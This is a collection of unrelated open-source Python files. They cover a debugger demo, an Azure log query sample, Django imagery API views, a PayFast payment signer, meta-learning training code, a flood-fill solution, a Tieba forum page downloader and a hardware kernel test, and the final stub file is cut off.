| 2.484375 | 2 |
chapter6/hello_debug_object_pdb.py | paiml/testing-in-python | 7 | 12762511 | <gh_stars>1-10
# Minimal object with no numeric behaviour: adding it to an int raises
# TypeError, which is the bug this pdb demo lets you inspect interactively.
class Z: pass
zz = Z()
def add(x,y):
    # Drops into the interactive debugger on every call (teaching demo).
    import pdb;pdb.set_trace()
    print(f"The value of x: {x}")
    print(f"The value of y: {y}")
    return x+y  # raises TypeError when y is a Z instance (int + Z unsupported)
result = add(3,zz)
print(result)
sdk/monitor/azure-monitor-query/samples/sample_logs_query_key_value_form.py | rsdoherty/azure-sdk-for-python | 0 | 12762512 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import pandas as pd
from datetime import datetime, timedelta
from msrest.serialization import UTC
from azure.monitor.query import LogsQueryClient
from azure.identity import DefaultAzureCredential
credential = DefaultAzureCredential()
client = LogsQueryClient(credential)
# Response time trend
# request duration over the last 12 hours.
query = """AppRequests |
summarize avgRequestDuration=avg(DurationMs) by bin(TimeGenerated, 10m), _ResourceId"""
# returns LogsQueryResult
# LOG_WORKSPACE_ID must be set in the environment; timespan limits the query window.
response = client.query_workspace(os.environ['LOG_WORKSPACE_ID'], query, timespan=timedelta(days=1))
try:
    table = response.tables[0]
    # Convert the first result table into a list of {column: value} records.
    df = pd.DataFrame(table.rows, columns=[col.name for col in table.columns])
    key_value = df.to_dict(orient='records')
    print(key_value)
except TypeError:
    # NOTE(review): on failure .tables is apparently not subscriptable, hence
    # TypeError -- confirm against the azure-monitor-query error model.
    print(response.error)
"""
[
{
'TimeGenerated': '2021-07-21T04:40:00Z',
'_ResourceId': '/subscriptions/faa080af....',
'avgRequestDuration': 19.7987
},
{
'TimeGenerated': '2021-07-21T04:50:00Z',
'_ResourceId': '/subscriptions/faa08....',
'avgRequestDuration': 33.9654
},
{
'TimeGenerated': '2021-07-21T05:00:00Z',
'_ResourceId': '/subscriptions/faa080....',
'avgRequestDuration': 44.13115
}
]
"""
| 2.28125 | 2 |
src/data_hub/lore/viewsets.py | TNRIS/api.tnris.org | 6 | 12762513 | <reponame>TNRIS/api.tnris.org
from rest_framework import viewsets
from rest_framework.response import Response
from .models import County, CountyRelate, Product, Collection, ChcView
from .serializers import (CountySerializer, ProductSerializer,
CollectionSerializer)
from rest_framework.permissions import AllowAny
import boto3
class CountyViewSet(viewsets.ReadOnlyModelViewSet):
    """
    Retrieve Texas county names & FIPS codes
    """
    # Read-only endpoint: full county table, GET only.
    queryset = County.objects.all()
    serializer_class = CountySerializer
    http_method_names = ['get']
class ProductViewSet(viewsets.ReadOnlyModelViewSet):
    """
    Retrieve TNRIS historical imagery collection physical products information
    """
    serializer_class = ProductSerializer
    http_method_names = ['get']
    def get_queryset(self):
        # Optional ?countyFips= filter: restrict products to the public
        # collections related to that county; otherwise return everything.
        fips = self.request.query_params.get('countyFips')
        if fips:
            county = County.objects.get(fips=fips)
            collections = (
                CountyRelate.objects.filter(county=county.id)
                .select_related("collection")
            )
            # only products whose collection is flagged public are exposed
            public_recs = Collection.objects.filter(public=True)
            queryset = (Product.objects.filter(collection_id__in=collections.values_list("collection"))
                       .filter(collection_id__in=public_recs.values_list("id")).select_related("collection"))
        else:
            queryset = Product.objects.select_related("collection")
        return queryset
class CollectionViewSet(viewsets.ReadOnlyModelViewSet):
    """
    Retrieve TNRIS historical imagery collection metadata & information
    """
    serializer_class = CollectionSerializer
    http_method_names = ['get']
    def get_queryset(self):
        # Only public collections are ever returned.
        args = {'public': True}
        null_list = ['null', 'Null', 'none', 'None']
        # create argument object of query clauses
        # NOTE(review): every query param (except limit/offset) is passed
        # straight into .filter(); an unknown field name raises FieldError.
        # Consider whitelisting the filterable fields.
        for field in self.request.query_params.keys():
            if field != 'limit' and field != 'offset':
                value = self.request.query_params.get(field)
                # convert null queries
                if value in null_list:
                    value = None
                args[field] = value
        # get records using query
        queryset = ChcView.objects.filter(**args).order_by('collection_id')
        return queryset
class MapserverViewSet(viewsets.ViewSet):
    """
    Retrieve TNRIS mapserver instance mapfiles list from S3 content objects
    """
    # *******************************************************************
    # *** this endpoint is not currently used by any of our apps/pages ***
    # *******************************************************************
    # This is an alternative, direct-from-s3 (what services truly exist) list of
    # mapserver service URLs. Same information can be/currently is retrieved by using the
    # '<index,frames,mosaic>_service_url' fields from the /api/v1/historical/collections
    # endpoint but if the LORE database and those fields are not properly populated,
    # then that result will be different from this endpoint
    permission_classes = (AllowAny,)

    def list(self, request):
        """Return one record per mapfile, parsed from its S3 key name."""
        client = boto3.client('s3')
        # Iterative pagination (the original recursed, which also crashed with
        # KeyError on an empty prefix because response['Contents'] was assumed).
        keys = []
        token = None
        while True:
            kwargs = {'Bucket': 'tnris-mapserver', 'Prefix': 'mapfiles/'}
            if token:
                kwargs['ContinuationToken'] = token
            response = client.list_objects_v2(**kwargs)
            keys.extend(obj['Key'] for obj in response.get('Contents', [])
                        if obj['Key'] != 'mapfiles/')
            token = response.get('NextContinuationToken')
            if not token:
                break
        # Build one dict per key. Using enumerate avoids the original's
        # O(n^2) all_keys.index(key) lookup inside the loop.
        results = []
        for key in keys:
            name = key.replace('mapfiles/', '').replace('.map', '')
            key_obj = {
                'name': name,
                'label': name.replace("_", " ").title(),
                'wms': 'https://mapserver.tnris.org/?map=/' + key,
            }
            parts = name.split("_")
            if len(parts) == 4:
                # county_agency_year_type
                county, agency, year, data_type = parts
                key_obj['org'] = 'county'
                key_obj['county'] = county
                key_obj['agency'] = agency
                key_obj['year'] = year
                key_obj['type'] = data_type
                key_obj['mission'] = 'n/a'
            elif len(parts) == 3:
                # agency_mission_type spanning multiple counties
                agency, mission, data_type = parts
                key_obj['org'] = 'multi'
                key_obj['county'] = 'MULTIPLE'
                key_obj['agency'] = agency
                key_obj['year'] = ''
                key_obj['type'] = data_type
                key_obj['mission'] = mission
            results.append(key_obj)
        return Response(results)
| 2.046875 | 2 |
payfast/signer.py | zengoma/django-oscar-payfast | 0 | 12762514 | <filename>payfast/signer.py
# -*- coding: utf-8 -*-
"""Signers are helpers to sign and verify Payfast requests & responses.
There is currently one type of signature:
* MD5
This class could be modified in future should payfast implement other signature methods eg SHA.
.. note::
**About the signature:**
The data passed in the form fields, is parsed into a url encoded querystring,
referred to as the “signing string”. The signature is then generated
and optionally "salted" using the PAYFAST_PASSPHRASE setting.
The signature is passed along with the form data and once Payfast receives it
they use the key to verify that the data has not been tampered with in
transit.
The signing string should be packed into a binary format containing hex
characters, and then encoded for transmission.
"""
import hashlib
try:
# Python > 3
import urllib.parse as parse
except ImportError:
# Python < 3
import urllib as parse
from payfast.constants import Constants
from .config import get_config
class AbstractSigner:
    """Abstract base class that defines the common signer interface.

    A signer must expose three methods:

    * :meth:`sign`: take form fields and return the signature value.
    * :meth:`verify`: take a dict of fields and make sure they carry an
      appropriate signature field.
    * :meth:`generate_hash`: take a signature string and compute its hash value.

    These methods are not implemented by the :class:`AbstractSigner`, therefore
    subclasses **must** implement them.
    """

    def sign(self, fields):
        """Sign the given form ``fields`` and return the signature.

        :param dict fields: The form fields used to perform a payment request
        :return: The signature value to send along with the request
        :rtype: ``str``

        A payment request form must contain a signature field, depending on
        the selected sign method.
        """
        raise NotImplementedError

    def verify(self, fields):
        """Verify ``fields`` contains the appropriate signatures.

        :param dict fields: A dict of fields, given by a payment return
            response or by a payment notification.
        :return: ``True`` if the ``fields`` contain valid signatures
        :rtype: ``boolean``
        """
        raise NotImplementedError

    def generate_hash(self, signature_string):
        """Return a hash for the given ``signature_string``.

        :param str signature_string: The string used to generate a signature.
        :return: A hashed version of ``signature_string``, optionally salted
            with the :attr:`PAYFAST_PASSPHRASE` setting.
        :rtype: ``str``
        """
        # The original abstract method was named 'genetrate_hash' (typo) and
        # therefore never matched the 'generate_hash' the subclass implements
        # and calls. The correctly spelled method is now the contract.
        raise NotImplementedError

    def genetrate_hash(self, signature_string):
        """Backward-compatible alias for the original misspelled name."""
        return self.generate_hash(signature_string)
class MD5Signer(AbstractSigner):
    """Implement a MD5 signature.

    .. seealso::

        The Payfast documentation about `MD5 signature generation`__ for an
        explanation on generating the signature.

        .. __: https://developers.payfast.co.za/documentation/#checkout-page
    """

    REQUEST_HASH_KEYS = (
        Constants.MERCHANT_ID,
        Constants.MERCHANT_KEY,
        Constants.RETURN_URL,
        Constants.CANCEL_URL,
        Constants.NOTIFY_URL,
        Constants.NAME_FIRST,
        Constants.NAME_LAST,
        Constants.EMAIL_ADDRESS,
        Constants.CELL_NUMBER,
        Constants.M_PAYMENT_ID,
        Constants.AMOUNT,
        Constants.ITEM_NAME,
        Constants.ITEM_DESCRIPTION,
        Constants.EMAIL_CONFIRMATION,
        Constants.CONFIRMATION_ADDRESS
    )
    """An ordered tuple of possible request keys

    This is used to build or verify the payfast signature before the user is
    directed to the payfast gateway. Note that the order of the fields matters
    when generating the hash with the MD5 algorithm.
    """

    RESPONSE_HASH_KEYS = (
        Constants.M_PAYMENT_ID,
        Constants.PF_PAYMENT_ID,
        Constants.PAYMENT_STATUS,
        Constants.ITEM_NAME,
        Constants.ITEM_DESCRIPTION,
        Constants.AMOUNT_GROSS,
        Constants.AMOUNT_FEE,
        Constants.AMOUNT_NET,
        Constants.NAME_FIRST,
        Constants.NAME_LAST,
        Constants.EMAIL_ADDRESS,
        Constants.MERCHANT_ID
    )
    """An ordered tuple of possible response/notification keys

    This is used to build or verify the payfast signature that is sent by
    payfast to the ITN endpoint. Note that the order of the fields matters
    when generating the hash with the MD5 algorithm.
    """

    def sign(self, fields):
        """Sign the given form ``fields`` and return the signature.

        :param dict fields: A dictionary of request fields
        :returns str signature: The signature to be sent with the payfast request

        .. seealso::
            The :meth:`AbstractSigner.sign` method for usage.
        """
        # Only keys with truthy values participate, in REQUEST_HASH_KEYS order.
        signature_list = [(key, fields[key]) for key in self.REQUEST_HASH_KEYS if fields.get(key, None)]
        signature_string = parse.urlencode(signature_list)
        signature = self.generate_hash(signature_string)
        return signature

    def verify(self, fields):
        """Verify ``fields`` contains the appropriate signature response from payfast.

        :param dict fields: A dictionary of request fields
        :returns bool: True only if the signature from the payfast server is valid

        .. seealso::
            The :meth:`AbstractSigner.verify` method for usage.
        """
        # Read the signature without mutating the caller's dict (the original
        # used fields.pop, destructively altering the input). 'signature' is
        # not in RESPONSE_HASH_KEYS, so it never enters the signing string.
        response_signature = fields.get('signature', None)
        signature_list = [(key, fields[key]) for key in self.RESPONSE_HASH_KEYS if fields.get(key, None)]
        signature_string = parse.urlencode(signature_list)
        signature = self.generate_hash(signature_string)
        return signature == response_signature

    def generate_hash(self, signature_string):
        """Generate the hash using the ``hashlib.md5`` algorithm.

        .. seealso::
            The :meth:`AbstractSigner.generate_hash` method for usage.
        """
        # Salt with the configured passphrase when one is set.
        if get_config().get_passphrase():
            signature_string += '&passphrase=' + parse.quote(get_config().get_passphrase())
        return hashlib.md5(signature_string.encode()).hexdigest()
| 2.984375 | 3 |
pbo1-project/Orders/__init__.py | hifra01/PBO1-Project | 0 | 12762515 | <filename>pbo1-project/Orders/__init__.py
from .Order import Order
| 1.210938 | 1 |
PP4E/Examples/PP4E/Preview/dump_db_pickle.py | BeacherHou/Python-_Markdown- | 0 | 12762516 | import pickle
# Reload the pickled "people" database written by the companion make_db script,
# print every record, then one field looked up by key.
# Fix: the file handle was never closed; a context manager guarantees cleanup.
with open('people-pickle', 'rb') as dbfile:  # use binary mode files in 3.X
    db = pickle.load(dbfile)

for key in db:
    print(key, '=>\n ', db[key])
# Assumes the database contains a 'sue' record with a 'name' field.
print(db['sue']['name'])
| 2.984375 | 3 |
main.py | dkkim93/pytorch-maml | 0 | 12762517 | import torch
import argparse
import os
import random
import numpy as np
from tensorboardX import SummaryWriter
from misc.utils import set_log, visualize
from torch.optim import SGD, Adam
from torch.nn.modules.loss import MSELoss
from inner_loop import InnerLoop
from omniglot_net import OmniglotNet
from score import *
from misc.batch_sampler import BatchSampler
from misc.replay_buffer import ReplayBuffer
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class MetaLearner(object):
    """MAML-style meta-learner: meta parameters live in `net`, while `fast_net`
    performs per-task inner-loop adaptation and returns per-task gradients."""
    def __init__(self, log, tb_writer, args):
        super(self.__class__, self).__init__()
        self.log = log
        self.tb_writer = tb_writer
        self.args = args
        self.loss_fn = MSELoss()
        # Meta network and its inner-loop counterpart (weights copied before each adaptation).
        self.net = OmniglotNet(self.loss_fn, args).to(device)
        self.fast_net = InnerLoop(self.loss_fn, args).to(device)
        self.opt = Adam(self.net.parameters(), lr=args.meta_lr)
        self.sampler = BatchSampler(args)
        self.memory = ReplayBuffer()
    def meta_update(self, episode_i, ls):
        """Apply the meta-gradient (element-wise sum of the grad dicts in `ls`)
        to self.net by hooking a dummy backward pass."""
        in_ = episode_i.observations[:, :, 0]
        target = episode_i.rewards[:, :, 0]
        # We use a dummy forward / backward pass to get the correct grads into self.net
        loss, out = forward_pass(self.net, in_, target)
        # Unpack the list of grad dicts
        gradients = {k: sum(d[k] for d in ls) for k in ls[0].keys()}
        # Register a hook on each parameter in the net that replaces the current dummy grad
        # with our grads accumulated across the meta-batch
        hooks = []
        for (k, v) in self.net.named_parameters():
            def get_closure():
                # get_closure() is invoked immediately below, so `key` binds the
                # current parameter name (avoids the late-binding closure pitfall).
                key = k
                def replace_grad(grad):
                    return gradients[key]
                return replace_grad
            hooks.append(v.register_hook(get_closure()))
        # Compute grads for current step, replace with summed gradients as defined by hook
        self.opt.zero_grad()
        loss.backward()
        # Update the net parameters with the accumulated gradient according to optimizer
        self.opt.step()
        # Remove the hooks before next training phase
        for h in hooks:
            h.remove()
    def test(self, i_task, episode_i_):
        """Clone the meta net, adapt it on the previous task's stored episode,
        then evaluate on both that episode and `episode_i_` and visualize."""
        predictions_ = []
        for i_agent in range(self.args.n_agent):
            test_net = OmniglotNet(self.loss_fn, self.args).to(device)
            # Make a test net with same parameters as our current net
            test_net.copy_weights(self.net)
            test_opt = SGD(test_net.parameters(), lr=self.args.fast_lr)
            episode_i = self.memory.storage[i_task - 1]
            # Train on the train examples, using the same number of updates as in training
            for i in range(self.args.fast_num_update):
                in_ = episode_i.observations[:, :, i_agent]
                target = episode_i.rewards[:, :, i_agent]
                loss, _ = forward_pass(test_net, in_, target)
                print("loss {} at {}".format(loss, i_task))
                test_opt.zero_grad()
                loss.backward()
                test_opt.step()
            # Evaluate the trained model on train and val examples
            tloss, _ = evaluate(test_net, episode_i, i_agent)
            vloss, prediction_ = evaluate(test_net, episode_i_, i_agent)
            mtr_loss = tloss / 10.
            mval_loss = vloss / 10.
            print('-------------------------')
            print('Meta train:', mtr_loss)
            print('Meta val:', mval_loss)
            print('-------------------------')
            del test_net
            predictions_.append(prediction_)
        visualize(episode_i, episode_i_, predictions_, i_task, self.args)
    def train(self):
        """Main loop: sample an episode per task, store it, periodically test,
        and run a meta-update once enough tasks are in memory."""
        for i_task in range(10000):
            # Sample episode from current task
            self.sampler.reset_task(i_task)
            episodes = self.sampler.sample()
            # Add to memory
            self.memory.add(i_task, episodes)
            # Evaluate on test tasks
            if len(self.memory) > 1:
                self.test(i_task, episodes)
            # Collect a meta batch update
            if len(self.memory) > 2:
                meta_grads = []
                for i in range(self.args.meta_batch_size):
                    if i == 0:
                        # Always include the two most recent tasks in the batch.
                        episodes_i = self.memory.storage[i_task - 1]
                        episodes_i_ = self.memory.storage[i_task]
                    else:
                        episodes_i, episodes_i_ = self.memory.sample()
                    self.fast_net.copy_weights(self.net)
                    for i_agent in range(self.args.n_agent):
                        meta_grad = self.fast_net.forward(episodes_i, episodes_i_, i_agent)
                        meta_grads.append(meta_grad)
                # Perform the meta update
                self.meta_update(episodes_i, meta_grads)
def main(args):
    """Prepare output directories, logging and RNG seeds, then run meta-training."""
    # Make sure both output directories exist before any writer touches them.
    for directory in ("./logs", "./pytorch_models"):
        if not os.path.exists(directory):
            os.makedirs(directory)

    # Logging: TensorBoard writer plus the project's text logger.
    tb_writer = SummaryWriter('./logs/tb_{0}'.format(args.log_name))
    log = set_log(args)

    # Seed every RNG source for reproducibility.
    seed = args.seed
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    if device == torch.device("cuda"):
        torch.cuda.manual_seed(seed)
        torch.cuda.manual_seed_all(seed)

    # Build the learner and start training.
    MetaLearner(log, tb_writer, args).train()
if __name__ == "__main__":
    # Command-line entry point: parse hyper-parameters, derive a log name, train.
    parser = argparse.ArgumentParser(description="")

    # General
    parser.add_argument(
        "--policy-type", type=str,
        choices=["discrete", "continuous", "normal"],
        help="Policy type available only for discrete, normal, and continuous")
    parser.add_argument(
        "--learner-type", type=str,
        choices=["meta", "finetune"],
        help="Learner type available only for meta, finetune")
    parser.add_argument(
        "--n-hidden", default=64, type=int,
        help="Number of hidden units")
    parser.add_argument(
        "--n-traj", default=1, type=int,
        help="Number of trajectory to collect from each task")

    # Meta-learning
    parser.add_argument(
        "--meta-batch-size", default=25, type=int,
        help="Number of tasks to sample for meta parameter update")
    parser.add_argument(
        "--fast-num-update", default=5, type=int,
        help="Number of updates for adaptation")
    parser.add_argument(
        "--meta-lr", default=0.03, type=float,
        help="Meta learning rate")
    parser.add_argument(
        "--fast-lr", default=10.0, type=float,
        help="Adaptation learning rate")
    # Fix: help text was a copy-paste of the --fast-lr description.
    parser.add_argument(
        "--first-order", action="store_true",
        help="Use the first-order approximation (skip second-order gradients)")

    # Env
    parser.add_argument(
        "--env-name", default="", type=str,
        help="OpenAI gym environment name")
    parser.add_argument(
        "--ep-max-timesteps", default=10, type=int,
        help="Episode is terminated when max timestep is reached.")
    parser.add_argument(
        "--n-agent", default=1, type=int,
        help="Number of agents in the environment")

    # Misc
    parser.add_argument(
        "--seed", default=0, type=int,
        help="Sets Gym, PyTorch and Numpy seeds")
    parser.add_argument(
        "--prefix", default="", type=str,
        help="Prefix for tb_writer and logging")

    args = parser.parse_args()

    # Set log name
    args.log_name = \
        "env::%s_seed::%s_learner_type::%s_meta_batch_size::%s_meta_lr::%s_fast_num_update::%s_" \
        "fast_lr::%s_prefix::%s_log" % (
            args.env_name, str(args.seed), args.learner_type, args.meta_batch_size, args.meta_lr,
            args.fast_num_update, args.fast_lr, args.prefix)

    main(args=args)
| 2.015625 | 2 |
pyschool/static/libs/importhooks/localstorage.py | niansa/brython-in-the-classroom | 14 | 12762518 | <gh_stars>10-100
import BaseHook
from browser.local_storage import storage
import sys
#define my custom import hook (just to see if it get called etc).
class LocalStorageHook(BaseHook.BaseHook):
    """Import hook that serves Brython modules out of browser local storage.

    Module source is looked up under '<path>/<fullname>.py' and, for packages,
    '<path>/<fullname>/__init__.py'.
    """

    def __init__(self, fullname, path):
        BaseHook.BaseHook.__init__(self, fullname, path)

    def find_module(self):
        # Try a plain module first, then a package __init__.
        for _ext in ('.py', '/__init__.py'):
            self._modpath = '%s/%s%s' % (self._path, self._fullname, _ext)
            try:
                # storage is dict-like, so a missing entry raises KeyError.
                # Was a bare `except:` that silently hid every other failure;
                # TODO confirm Brython's storage raises nothing else on lookup.
                self._module = storage[self._modpath]
                return self
            except KeyError:
                pass
        # if we got here, we couldn't find the module
        raise ImportError
sys.meta_path.append(LocalStorageHook)
| 2.28125 | 2 |
solutions/733.floodFill.py | lim1202/LeetCodeProblems | 0 | 12762519 | """
733. Flood Fill
An image is represented by an m x n integer grid image where image[i][j] represents the pixel value of the image.
You are also given three integers sr, sc, and newColor. You should perform a flood fill on the image starting from the pixel image[sr][sc].
To perform a flood fill, consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color), and so on. Replace the color of all of the aforementioned pixels with newColor.
Return the modified image after performing the flood fill.
Example 1:
Input: image = [[1,1,1],[1,1,0],[1,0,1]], sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation: From the center of the image with position (sr, sc) = (1, 1) (i.e., the red pixel), all pixels connected by a path of the same color as the starting pixel (i.e., the blue pixels) are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected to the starting pixel.
Example 2:
Input: image = [[0,0,0],[0,0,0]], sr = 0, sc = 0, newColor = 2
Output: [[2,2,2],[2,2,2]]
Constraints:
m == image.length
n == image[i].length
1 <= m, n <= 50
0 <= image[i][j], newColor < 216
0 <= sr < m
0 <= sc < n
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/flood-fill
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
import collections
from typing import List
class Solution:
    def floodFill(
        self, image: List[List[int]], sr: int, sc: int, newColor: int
    ) -> List[List[int]]:
        """Recolor the 4-connected region containing (sr, sc) in place.

        Iterative depth-first traversal; returns the mutated image.
        """
        original = image[sr][sc]
        if original == newColor:
            # Nothing to change; also prevents an infinite traversal.
            return image
        rows, cols = len(image), len(image[0])
        stack = [(sr, sc)]
        image[sr][sc] = newColor
        while stack:
            r, c = stack.pop()
            # Visit the four orthogonal neighbours still carrying the old color.
            for nr, nc in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
                if 0 <= nr < rows and 0 <= nc < cols and image[nr][nc] == original:
                    image[nr][nc] = newColor
                    stack.append((nr, nc))
        return image
if __name__ == "__main__":
    # Demo run matching Example 1 from the problem statement.
    image, sr, sc, newColor = [[1, 1, 1], [1, 1, 0], [1, 0, 1]], 1, 1, 2
    print("Input: image = {}, sr = {}, sc = {}, newColor = {}".format(image, sr, sc, newColor))
    print("Output:", Solution().floodFill(image, sr, sc, newColor))
| 4.34375 | 4 |
month05/Spider/day01_course/day01_code/05_tieba_spider.py | chaofan-zheng/python_learning_code | 0 | 12762520 | import time
import random
import requests
# def tieba_spider(keyword, page_start, page_end):
# url = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'
# headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'
# ' AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'}
# for page in range(page_start, page_end):
# res = requests.get(url=url.format(keyword, (page - 1) * 50), headers=headers).content.decode(encoding='utf8',
# errors='ignore')
# filename = './tieba/{}吧_第{}页.html'.format(keyword, page)
# with open(filename, 'w') as f:
# f.write(res)
#
#
# keyword = input('关键字')
# page_start = input('开始页')
# page_end = input('结束页')
# print(keyword,page_start,page_end)
# tieba_spider(keyword, page_start, page_end)
class TieBaSpider:
    """Crawler that downloads Baidu Tieba forum listing pages to local HTML files."""

    def __init__(self):
        # kw = forum keyword, pn = 0-based post offset (50 posts per page).
        # Fix: dropped the stray `url =` alias that leaked a module-level name.
        self.url = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'
        self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'
                        ' AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1'}

    def get_html(self, url):
        """Fetch one page and return its decoded text."""
        html = requests.get(url=url, headers=self.headers).text
        return html

    def parse_html(self):
        """Parse function (not implemented yet)."""
        pass

    def save_html(self, filename, html):
        """Write the page text to `filename` as UTF-8.

        Fix: the file is now closed via a context manager and written with an
        explicit encoding — the pages contain Chinese text, and the platform
        default encoding may not be able to represent it.
        """
        with open(filename, 'w', encoding='utf-8') as f:
            f.write(html)

    def crawl(self):
        """Interactive crawl loop: ask for a forum name and page range, save each page."""
        name = input('贴吧名:')
        start = int(input('开始页'))
        end = int(input('结束页'))
        for page in range(start, end + 1):
            url = self.url.format(name, (page - 1) * 50)
            html = self.get_html(url)
            filename = './tieba/{}吧_第{}页.html'.format(name, page)
            self.save_html(filename, html)
            # Randomized delay to avoid hammering the server.
            time.sleep(random.randint(1, 3))
if __name__ == '__main__':
    # Entry point: prompt for forum name / page range and start the crawl.
    spider = TieBaSpider()
    spider.crawl()
| 2.765625 | 3 |
tests/common/test_run/ascend/five2four_run.py | tianjiashuo/akg | 286 | 12762521 | <reponame>tianjiashuo/akg
# Copyright 2019-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from tests.common.tensorio import compare_tensor
from akg.utils import kernel_exec as utils
from akg.ops.array.ascend import Five2Four
from akg import tvm
from tests.common.base import get_rtol_atol
from tests.common.gen_random import random_gaussian
import math
def compute_blockdim(shape):
    """Pick a launch block dim: one block per 16384 elements, capped at 32.

    `shape` may be a list/tuple of dims, a plain int element count, or anything
    else (which falls back to a tiny default size of 2).
    """
    if isinstance(shape, (list, tuple)):
        size = math.prod(shape)
    elif isinstance(shape, int):
        size = shape
    else:
        size = 2  # unknown shape descriptor: assume a minimal workload
    return min(32, math.ceil(size / 16384))
def five2four_execute(shape4d, out_dtype, format, dtype, attrs):
    """Build, launch and verify the five2four (5D -> 4D layout) kernel.

    :param shape4d: target 4D output shape, interpreted per ``format``
    :param out_dtype: dtype of the 4D output tensor
    :param format: 4D data layout, 'NCHW' or 'NHWC'
    :param dtype: dtype of the generated 5D input
    :param attrs: build/run attributes; supports 'tuning' and 'dynamic' modes
    """
    # Generate data
    op_attrs = [shape4d, out_dtype, format]
    if attrs is None:
        attrs = {}
    if 'tuning' in attrs.keys():
        # Tuning mode: only build the kernel (and optionally return test data).
        t = attrs.get("tuning", False)
        kernel_name = attrs.get("kernel_name", False)
        input, bench_mark = gen_data(shape4d, dtype, out_dtype, format)
        shape_5d = input.shape
        mod = five2four_compile(shape_5d, dtype, op_attrs, attrs, kernel_name=kernel_name, tuning=t)
        if t:
            output = np.full(shape4d, np.nan, out_dtype)
            return mod, bench_mark, (input, output)
        else:
            return mod
    else:
        input, bench_mark = gen_data(shape4d, dtype, out_dtype, format)
        # mod launch
        shape_5d = input.shape
        mod = five2four_compile(shape_5d, dtype, op_attrs, attrs)
        # Pre-fill the output with NaN so untouched elements fail the compare.
        output = np.full(shape4d, np.nan, out_dtype)
        args = [input, output]
        # if attrs.get("dynamic"):
        #     for i in range(len(shape4d) - 1, -1, -1):
        #         args.append(shape4d[i])
        if attrs.get("dynamic"):
            # Dynamic-shape kernels take extra runtime args — presumably the
            # N, C1 and C0 dims of the NC1HWC0 layout plus the block dim.
            args.append(shape_5d[0])
            args.append(shape_5d[1])
            args.append(shape_5d[4])
            block_dim = compute_blockdim(shape4d)
            args.append(block_dim)
        output = utils.mod_launch(mod, args, outputs=(1,), expect=bench_mark)
        # compare result
        rtol, atol = get_rtol_atol("five2four", dtype)
        compare_result = compare_tensor(output, bench_mark, rtol=rtol, atol=atol, equal_nan=True)
        return input, output, bench_mark, compare_result
def five2four_compile(shape_5d, dtype, op_attrs, attrs, kernel_name='five2four', tuning=False):
    """Build the Five2Four op; in dynamic mode non-unit dims become TVM vars."""
    if attrs.get("dynamic"):
        var_shape = []
        shape4d, dst_type, _ = op_attrs
        channel_idx = 1  # NOTE(review): unused
        for i in range(len(shape_5d)):
            if shape_5d[i] == 1:
                # Keep literal 1s so the build can still exploit them.
                var_shape.append(shape_5d[i])
            else:
                var_shape.append(tvm.var("I" + str(i)))
        build_shape = var_shape
    else:
        build_shape = shape_5d
    return utils.op_build_test(Five2Four, [build_shape], [dtype], op_attrs, kernel_name=kernel_name, attrs=attrs, tuning=tuning)
def gen_data(shape, dtype, out_dtype, format):
    """Create a packed 5D input and its 4D expected output.

    Channels are zero-padded up to a multiple of 16, then packed into a
    16-wide trailing C0 axis (the result is (N, C1, H, W, C0)).
    """
    bench_mark = random_gaussian(shape, miu=1, sigma=0.3).astype(dtype)
    if format == 'NCHW':
        n, c, h, w = shape
        if c % 16 != 0:
            pad_input_shape = [n, c, h, w]
            pad_c = (c + 15) // 16 * 16  # round channels up to a multiple of 16
            pad_input_shape[1] = pad_c
            pad_input = np.zeros(pad_input_shape).astype(dtype)
            pad_input[:, :c, :, :] = bench_mark
            new_shape = [n, pad_c // 16, 16, h, w]
            # (N, C1, C0, H, W) -> (N, C1, H, W, C0)
            input = pad_input.reshape(new_shape).transpose(0, 1, 3, 4, 2)
        else:
            new_shape = [n, c // 16, 16, h, w]
            input = bench_mark.reshape(new_shape).transpose(0, 1, 3, 4, 2)
    elif format == 'NHWC':
        n, h, w, c = shape
        if c % 16 != 0:
            pad_input_shape = [n, h, w, c]
            pad_c = (c + 15) // 16 * 16
            pad_input_shape[3] = pad_c
            pad_input = np.zeros(pad_input_shape).astype(dtype)
            pad_input[:, :, :, :c] = bench_mark
            new_shape = [n, h, w, pad_c // 16, 16]
            # (N, H, W, C1, C0) -> (N, C1, H, W, C0)
            input = pad_input.reshape(new_shape).transpose(0, 3, 1, 2, 4)
        else:
            new_shape = [n, h, w, c // 16, 16]
            input = bench_mark.reshape(new_shape).transpose(0, 3, 1, 2, 4)
    # The expected output keeps the original 4D layout, cast to out_dtype.
    bench_mark = bench_mark.astype(out_dtype)
    return input, bench_mark
| 1.835938 | 2 |
micropython-maixpy-0_6_2-66/stubs/cmath.py | mongonta0716/stub_for_maixpy | 1 | 12762522 | """
Module: 'cmath' on micropython-maixpy-0.6.2-66
"""
# MCU: {'ver': '0.6.2-66', 'build': '66', 'sysname': 'MaixPy', 'platform': 'MaixPy', 'version': '0.6.2', 'release': '0.6.2', 'port': 'MaixPy', 'family': 'micropython', 'name': 'micropython', 'machine': 'Sipeed_M1 with kendryte-k210', 'nodename': 'MaixPy'}
# Stubber: 1.3.9
# The functions below are empty stubs generated by Stubber; the real cmath
